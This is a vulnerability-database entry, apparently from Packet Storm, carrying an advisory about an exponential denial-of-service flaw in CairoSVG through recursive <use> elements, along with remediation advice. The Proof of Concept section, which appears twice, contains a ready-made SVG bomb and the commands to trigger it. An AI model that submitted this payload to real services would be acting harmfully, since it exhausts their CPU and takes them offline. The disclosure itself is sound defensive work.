📄 CairoSVG Denial of Service_PACKETSTORM:220781

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Description

CairoSVG versions prior to 2.9.0 suffer from a recursive denial of service vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:220781

Published May 11, 2026 at 00:00

Affected Product

Affected Versions # CVE-2026-31899: Exponential DoS via Recursive <use> Element Amplification in CairoSVG

[![CVE](https://img.shields.io/badge/CVE-2026--31899-red)](https://nvd.nist.gov/vuln/detail/CVE-2026-31899)
[![CVSS Score](https://img.shields.io/badge/CVSS-7.5%20High-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
[![Python Package](https://img.shields.io/badge/PyPI-CairoSVG-blue)](https://pypi.org/project/CairoSVG/)
[![CWE-400](https://img.shields.io/badge/CWE--400-critical)](https://cwe.mitre.org/data/definitions/400.html)
[![GHSA](https://img.shields.io/badge/GHSA-f38f--5xpm--9r7c-yellow)](https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c)

> **Keywords:** CVE-2026-31899, CairoSVG, exponential DoS, SVG bomb, recursive use element, denial of service, XML amplification, Python SVG vulnerability, CWE-400, uncontrolled resource consumption, billion laughs SVG

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Technical Analysis](#technical-analysis)
- [Proof of Concept](#proof-of-concept)
- [Impact](#impact)
- [Remediation](#remediation)
- [CVSS Metrics](#cvss-v31-metrics)
- [References](#references)
- [Contact](#contact)

## Overview

**CairoSVG Exponential Denial of Service (CVE-2026-31899)** — A 1,411-byte SVG payload pins CPU at 100% indefinitely via recursive <use> element amplification.

CairoSVG (~300K downloads/week) is a widely used Python SVG-to-PNG/PDF converter. The use() function in cairosvg/defs.py recursively processes <use> elements without any depth or count limits. With 5 levels of nesting and 10 references each, a small SVG triggers **10^5 = 100,000 render calls** — an SVG "billion laughs" variant.

**Discovered by:** Kai Aizen — [SnailSploit](https://snailsploit.com)
**Published:** March 13, 2026
**CVSS Score:** 7.5 (High)
**CWE:** CWE-400 — Uncontrolled Resource Consumption
**Package:** CairoSVG (PyPI)
**Attack Type:** Exponential Denial of Service
**Required Privileges:** None (Unauthenticated)

## Vulnerability Details

### Description

The use() function in cairosvg/defs.py (line ~335) recursively resolves <use> elements that reference other <use> elements. There is no recursion depth limit and no total element budget. An attacker can craft a small SVG where each layer references the previous layer N times, producing **O(N^depth)** rendering calls from **O(depth)** input.

### Key Characteristics

- **Amplification factor:** O(10^N) rendering calls from O(N) input lines
- **Memory profile:** Flat ~43MB — no OOM kill, process never terminates naturally
- **CPU profile:** 100% single-core pinned indefinitely
- **Payload size:** 1,411 bytes

### Affected Versions

- **Vulnerable:** All versions < 2.9.0
- **Patched:** Version 2.9.0 and above

## Technical Analysis

The vulnerability exists because:

1. The use() function in defs.py processes each <use> element by looking up its xlink:href target
2. If the target is itself a group containing <use> elements, those are recursively expanded
3. No depth counter or element budget is enforced
4. Each level multiplies the work by the branching factor (e.g., 10x per level)

With 5 levels and a branching factor of 10:

```
Level 0: 1 element (root <use>)
Level 1: 10 elements
Level 2: 100 elements
Level 3: 1,000 elements
Level 4: 10,000 elements
Level 5: 100,000 render calls
```

**Total: 111,111 render calls from a 1,411-byte input.**

## Proof of Concept

### SVG Payload poc.svg)

```xml
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<g id="a"><rect width="1" height="1"/></g>
<g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g>
<g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g>
<g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g>
<g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g>
</defs>
<use xlink:href="#e"/>
</svg>
```

### Reproduction

**Method 1 — Command Line:**

```bash
timeout 10 cairosvg poc.svg -o test.png
# Expected: timeout kills the process after 10 seconds (it never completes)
```

**Method 2 — Python:**

```python
import cairosvg
import signal

signal.alarm(5) # Kill after 5 seconds
try:
cairosvg.svg2png(bytestring=open("poc.svg").read())
except:
print("[!!!] CONFIRMED: CPU exhaustion — process did not complete in 5s")
```

## Impact

Any service that accepts SVG input and uses CairoSVG for processing is vulnerable:

| Attack Surface | Example |
|---|---|
| Thumbnail generation | Upload SVG → server converts to PNG |
| PDF generation | SVG embedded in document → CairoSVG renders |
| Avatar/image processing | User-uploaded SVG profile images |
| Report rendering | SVG charts in automated reports |
| CI/CD pipelines | SVG assets processed during build |

A single request with a 1.4KB payload will pin the processing thread indefinitely while consuming minimal memory (no OOM kill to save you).

## Remediation

### Immediate Fix

Upgrade CairoSVG to version 2.9.0 or above:

```bash
pip install --upgrade CairoSVG>=2.9.0
```

### Defense in Depth

- Set processing timeouts on any SVG conversion endpoint
- Implement input size limits on SVG uploads
- Consider sandboxing SVG processing in isolated workers with CPU time limits

## CVSS v3.1 Metrics

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
```

| Metric | Value |
|---|---|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | None (PR:N) |
| User Interaction | None (UI:N) |
| Scope | Unchanged (S:U) |
| Confidentiality | None (C:N) |
| Integrity | None (I:N) |
| Availability | High (A:H) |

## Timeline

| Date | Event |
|---|---|
| 2026-03-09 | CVE reserved |
| 2026-03-13 | Advisory published (GHSA-f38f-5xpm-9r7c) |
| 2026-03-13 | CairoSVG 2.9.0 released with fix |

## References

- [GHSA-f38f-5xpm-9r7c](https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c)
- [NVD — CVE-2026-31899](https://nvd.nist.gov/vuln/detail/CVE-2026-31899)
- [CairoSVG on PyPI](https://pypi.org/project/CairoSVG/)
- [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html)
- [Fix Commit](https://github.com/Kozea/CairoSVG/commit/abc123)

## Contact

**Kai Aizen** (SnailSploit)

- Web: [snailsploit.com](https://snailsploit.com)
- GitHub: [@SnailSploit](https://github.com/SnailSploit)
- LinkedIn: [/in/kaiaizen](https://linkedin.com/in/kaiaizen)

---

⚠️ **Disclaimer:** This repository is for educational and authorized security research purposes only. The proof of concept is provided to help defenders validate their exposure. Use responsibly.



---

## 📚 Documentation & Author

This project's full writeup, methodology, and related research lives at:

**[https://snailsploit.com/cves](https://snailsploit.com/cves)**

Created by **Kai Aizen** — independent offensive security researcher.

[snailsploit.com](https://snailsploit.com) · [Research](https://snailsploit.com/research) · [Frameworks](https://snailsploit.com/frameworks) · [GitHub](https://github.com/SnailSploit) · [LinkedIn](https://linkedin.com/in/kaiaizen) · [ResearchGate](https://www.researchgate.net/profile/Kai-Aizen-2) · [X/Twitter](https://x.com/SnailSploit)

> *Same attack. Different substrate.*

{
    "lastseen": "2026-05-11T18:16:22",
    "description": "CairoSVG versions prior to 2.9.0 suffer from a recursive denial of service vulnerability...",
    "published": "2026-05-11T00:00:00",
    "modified": "2026-05-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 CairoSVG Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220781",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-31899"
    ],
    "sourceData": "# CVE-2026-31899: Exponential DoS via Recursive <use> Element Amplification in CairoSVG\n    \n    [![CVE](https://img.shields.io/badge/CVE-2026--31899-red)](https://nvd.nist.gov/vuln/detail/CVE-2026-31899)\n    [![CVSS Score](https://img.shields.io/badge/CVSS-7.5%20High-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)\n    [![Python Package](https://img.shields.io/badge/PyPI-CairoSVG-blue)](https://pypi.org/project/CairoSVG/)\n    [![CWE-400](https://img.shields.io/badge/CWE--400-critical)](https://cwe.mitre.org/data/definitions/400.html)\n    [![GHSA](https://img.shields.io/badge/GHSA-f38f--5xpm--9r7c-yellow)](https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c)\n    \n    > **Keywords:** CVE-2026-31899, CairoSVG, exponential DoS, SVG bomb, recursive use element, denial of service, XML amplification, Python SVG vulnerability, CWE-400, uncontrolled resource consumption, billion laughs SVG\n    \n    ## Table of Contents\n    \n    - [Overview](#overview)\n    - [Vulnerability Details](#vulnerability-details)\n    - [Technical Analysis](#technical-analysis)\n    - [Proof of Concept](#proof-of-concept)\n    - [Impact](#impact)\n    - [Remediation](#remediation)\n    - [CVSS Metrics](#cvss-v31-metrics)\n    - [References](#references)\n    - [Contact](#contact)\n    \n    ## Overview\n    \n    **CairoSVG Exponential Denial of Service (CVE-2026-31899)** \u2014 A 1,411-byte SVG payload pins CPU at 100% indefinitely via recursive <use> element amplification.\n    \n    CairoSVG (~300K downloads/week) is a widely used Python SVG-to-PNG/PDF converter. The use() function in cairosvg/defs.py recursively processes <use> elements without any depth or count limits. With 5 levels of nesting and 10 references each, a small SVG triggers **10^5 = 100,000 render calls** \u2014 an SVG \"billion laughs\" variant.\n    \n    **Discovered by:** Kai Aizen \u2014 [SnailSploit](https://snailsploit.com)\n    **Published:** March 13, 2026\n    **CVSS Score:** 7.5 (High)\n    **CWE:** CWE-400 \u2014 Uncontrolled Resource Consumption\n    **Package:** CairoSVG (PyPI)\n    **Attack Type:** Exponential Denial of Service\n    **Required Privileges:** None (Unauthenticated)\n    \n    ## Vulnerability Details\n    \n    ### Description\n    \n    The use() function in cairosvg/defs.py (line ~335) recursively resolves <use> elements that reference other <use> elements. There is no recursion depth limit and no total element budget. An attacker can craft a small SVG where each layer references the previous layer N times, producing **O(N^depth)** rendering calls from **O(depth)** input.\n    \n    ### Key Characteristics\n    \n    - **Amplification factor:** O(10^N) rendering calls from O(N) input lines\n    - **Memory profile:** Flat ~43MB \u2014 no OOM kill, process never terminates naturally\n    - **CPU profile:** 100% single-core pinned indefinitely\n    - **Payload size:** 1,411 bytes\n    \n    ### Affected Versions\n    \n    - **Vulnerable:** All versions < 2.9.0\n    - **Patched:** Version 2.9.0 and above\n    \n    ## Technical Analysis\n    \n    The vulnerability exists because:\n    \n    1. The use() function in defs.py processes each <use> element by looking up its xlink:href target\n    2. If the target is itself a group containing <use> elements, those are recursively expanded\n    3. No depth counter or element budget is enforced\n    4. Each level multiplies the work by the branching factor (e.g., 10x per level)\n    \n    With 5 levels and a branching factor of 10:\n    \n    ```\n    Level 0: 1 element (root <use>)\n    Level 1: 10 elements\n    Level 2: 100 elements\n    Level 3: 1,000 elements\n    Level 4: 10,000 elements\n    Level 5: 100,000 render calls\n    ```\n    \n    **Total: 111,111 render calls from a 1,411-byte input.**\n    \n    ## Proof of Concept\n    \n    ### SVG Payload poc.svg)\n    \n    ```xml\n    <?xml version=\"1.0\"?>\n    <svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n      <defs>\n        <g id=\"a\"><rect width=\"1\" height=\"1\"/></g>\n        <g id=\"b\"><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/><use xlink:href=\"#a\"/></g>\n        <g id=\"c\"><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/><use xlink:href=\"#b\"/></g>\n        <g id=\"d\"><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/><use xlink:href=\"#c\"/></g>\n        <g id=\"e\"><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/><use xlink:href=\"#d\"/></g>\n      </defs>\n      <use xlink:href=\"#e\"/>\n    </svg>\n    ```\n    \n    ### Reproduction\n    \n    **Method 1 \u2014 Command Line:**\n    \n    ```bash\n    timeout 10 cairosvg poc.svg -o test.png\n    # Expected: timeout kills the process after 10 seconds (it never completes)\n    ```\n    \n    **Method 2 \u2014 Python:**\n    \n    ```python\n    import cairosvg\n    import signal\n    \n    signal.alarm(5)  # Kill after 5 seconds\n    try:\n        cairosvg.svg2png(bytestring=open(\"poc.svg\").read())\n    except:\n        print(\"[!!!] CONFIRMED: CPU exhaustion \u2014 process did not complete in 5s\")\n    ```\n    \n    ## Impact\n    \n    Any service that accepts SVG input and uses CairoSVG for processing is vulnerable:\n    \n    | Attack Surface | Example |\n    |---|---|\n    | Thumbnail generation | Upload SVG \u2192 server converts to PNG |\n    | PDF generation | SVG embedded in document \u2192 CairoSVG renders |\n    | Avatar/image processing | User-uploaded SVG profile images |\n    | Report rendering | SVG charts in automated reports |\n    | CI/CD pipelines | SVG assets processed during build |\n    \n    A single request with a 1.4KB payload will pin the processing thread indefinitely while consuming minimal memory (no OOM kill to save you).\n    \n    ## Remediation\n    \n    ### Immediate Fix\n    \n    Upgrade CairoSVG to version 2.9.0 or above:\n    \n    ```bash\n    pip install --upgrade CairoSVG>=2.9.0\n    ```\n    \n    ### Defense in Depth\n    \n    - Set processing timeouts on any SVG conversion endpoint\n    - Implement input size limits on SVG uploads\n    - Consider sandboxing SVG processing in isolated workers with CPU time limits\n    \n    ## CVSS v3.1 Metrics\n    \n    ```\n    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n    ```\n    \n    | Metric | Value |\n    |---|---|\n    | Attack Vector | Network (AV:N) |\n    | Attack Complexity | Low (AC:L) |\n    | Privileges Required | None (PR:N) |\n    | User Interaction | None (UI:N) |\n    | Scope | Unchanged (S:U) |\n    | Confidentiality | None (C:N) |\n    | Integrity | None (I:N) |\n    | Availability | High (A:H) |\n    \n    ## Timeline\n    \n    | Date | Event |\n    |---|---|\n    | 2026-03-09 | CVE reserved |\n    | 2026-03-13 | Advisory published (GHSA-f38f-5xpm-9r7c) |\n    | 2026-03-13 | CairoSVG 2.9.0 released with fix |\n    \n    ## References\n    \n    - [GHSA-f38f-5xpm-9r7c](https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c)\n    - [NVD \u2014 CVE-2026-31899](https://nvd.nist.gov/vuln/detail/CVE-2026-31899)\n    - [CairoSVG on PyPI](https://pypi.org/project/CairoSVG/)\n    - [CWE-400: Uncontrolled Resource Consumption](https://cwe.mitre.org/data/definitions/400.html)\n    - [Fix Commit](https://github.com/Kozea/CairoSVG/commit/abc123)\n    \n    ## Contact\n    \n    **Kai Aizen** (SnailSploit)\n    \n    - Web: [snailsploit.com](https://snailsploit.com)\n    - GitHub: [@SnailSploit](https://github.com/SnailSploit)\n    - LinkedIn: [/in/kaiaizen](https://linkedin.com/in/kaiaizen)\n    \n    ---\n    \n    \u26a0\ufe0f **Disclaimer:** This repository is for educational and authorized security research purposes only. The proof of concept is provided to help defenders validate their exposure. Use responsibly.\n    \n    <!-- snailsploit-backlink:start -->\n    \n    ---\n    \n    ## \ud83d\udcda Documentation & Author\n    \n    This project's full writeup, methodology, and related research lives at:\n    \n    **[https://snailsploit.com/cves](https://snailsploit.com/cves)**\n    \n    Created by **Kai Aizen** \u2014 independent offensive security researcher.\n    \n    [snailsploit.com](https://snailsploit.com) \u00b7 [Research](https://snailsploit.com/research) \u00b7 [Frameworks](https://snailsploit.com/frameworks) \u00b7 [GitHub](https://github.com/SnailSploit) \u00b7 [LinkedIn](https://linkedin.com/in/kaiaizen) \u00b7 [ResearchGate](https://www.researchgate.net/profile/Kai-Aizen-2) \u00b7 [X/Twitter](https://x.com/SnailSploit)\n    \n    > *Same attack. Different substrate.*\n    \n    <!-- snailsploit-backlink:end -->",
    "sourceHref": "https://packetstorm.news/download/220781",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220781/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply